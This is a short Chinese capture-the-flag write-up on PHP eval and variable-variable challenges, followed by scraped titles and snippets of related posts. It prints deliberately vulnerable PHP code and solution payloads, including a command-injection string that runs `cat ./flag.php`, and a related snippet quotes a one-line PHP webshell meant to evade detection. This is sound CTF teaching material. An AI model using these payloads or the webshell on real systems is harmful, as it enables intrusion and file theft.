CTF之文件包含的猥琐思路
From: i春秋 百度杯”CTF
一:
<?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值 if(!preg_match('/^\w*$/',$a )){ //正则表达式,匹配字符串,\w表示字符+数字+下划线,*代表有若干个\w字符组成。 die('ERROR');//不匹配则输出ERROR } eval("var_dump($$a);"); //如果匹配输出\$\$a的值 show_source(__FILE__);?>
PHP一个比较有意思的变量!$GLOBALS:一个包含了全部变量的全局组合数组。变量的名字就是数组的键。于是我们在url上构造/?hello=GLOBALS,结果就直接出来了!根本不是爆破好吧!
答案:/?hello=GLOBALS
二:
<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__);
反引号位 (`) 是可以执行命令的
答案:?hello=);echo%20`cat%20./flag.php`;//
三:
<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?>
CTF之文件包含的猥琐思路相关推荐
- 猥琐思路复现Spring WebFlow远程代码执行
本文讲的是猥琐思路复现Spring WebFlow远程代码执行,说明:做安全的,思路不猥琐是日不下站的,必须变的猥琐起来,各种思路就会在你脑海中迸发. 1.不温不火的漏洞 这个漏洞在六月份的时候就被提 ...
- (转)无特征过狗一句话猥琐思路
0×01 姿势一 我们知道PHP动态函数很有意思,那么你猜到了,姿势一就是: <?php$_POST['xx']($_POST['oo']);?> 注意XX参数设置成EVAL是不行的哦, ...
- php文件包含读源码,CTF PHP文件包含--session
PHP文件包含 Session 首先了解一下PHP文件包含漏洞----包含session 利用条件:session文件路径已知,且其中内容部分可控. 姿势: php的session文件的保存路径可以在 ...
- php文件包含session,CTF PHP文件包含--session
PHP文件包含 Session 首先了解一下PHP文件包含漏洞----包含session 利用条件:session文件路径已知,且其中内容部分可控. 姿势: php的session文件的保存路径可以在 ...
- CG CTF WEB 文件包含
http://4.chinalover.sinaapp.com/web7/index.php 题解: 文件包含漏洞的格式网址,通过php://filter读取index源码-->php://fi ...
- fopen打开ftp文件_PHP文件包含漏洞利用思路与Bypass总结手册(一)
作者:Qftm 合天智汇 前言 这个手册主要是记录针对PHP文件包含漏洞的利用思路与Bypass手法的总结. 相关函数 四个函数 php中引发文件包含漏洞的通常主要是以下四个函数: 1.include ...
- PHP文件包含漏洞利用思路与Bypass总结手册(一)
本文作者:Qftm 目录 前言 相关函数 四个函数 函数功能 函数差异 漏洞原因 漏洞分类 包含姿势 php伪协议 php://filter file:// php://input file_get_ ...
- require php 用不用,PHP中你应该知道的require()文件包含的正确用法
以前看一些PHP框架源码的时候,很奇怪在文件包含的时候,会用dirname(__FILE__)来拼凑文件路径,不知道这样做有什么好处,后来终于发现了其中的缘由. 我们来看一个简单的例子: 有a,b,c ...
- 攻防世界CTF —— PHP本地文件包含漏洞解题思路
原题目如下: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page ...
最新文章
- 关于阿里面试的的一个小题
- java 内部类 加载_java内部类及类加载顺序
- 什么是Promise?前端开发人员会使用Promise简直就是如虎添翼
- 神策数据林美天于大数据与人工智能分享沙龙分享
- 数据库:MySQL、SqlServer、Oracle对比
- 1.数据湖deltalake初识
- 时间转化_Excel常见时间日期函数全讲解,10个函数教你如何进行日期转化
- 支撑百万并发的数据库架构如何设计?
- 技术的好文章和烂文章
- 数据结构实验1-线性表的顺序实现
- GBaseDataStudio 管理工具简介
- 怎么在苹果手机计算机上打字,iPhone苹果手机在打字时如何进行换行
- Unity 内置渲染管线、SRP、URP、HDRP区别
- java manager层_在阿里Java大牛们都是这样对Java项目代码分层的
- 2020版本kali安装
- 小鸡腿U T7 NEERC2011
- 计算机的常用外部设备作用,八计算机常用外部设备.ppt
- 决策树例子与python实现
- macOS 使用 X11 运行远端 linux 中的 x11 client 图形程序
- 电源常识-差模干扰共模干扰
热门文章
- 【请教】服务器上出现的两个问题!
- 不用AJAX实现前台JS调用后台C#方法(小技巧)
- IT网络通信大变革时代来临 2016中国极客大奖为您找到风向标
- 2.4 表单数据的验证
- hdu4521 小明系列的问题——小明序列(LIS变种 (段树+单点更新解决方案))
- ipfs-hdfs分布式文件系统
- python 欠采样_数据科学家需要了解的 5 种采样方法
- asp sql ip地址排序_SQL必知必会读书笔记,30分钟入门SQL!
- 消息中间件--RabbitMQ --死信队列
- thinkphp增删改查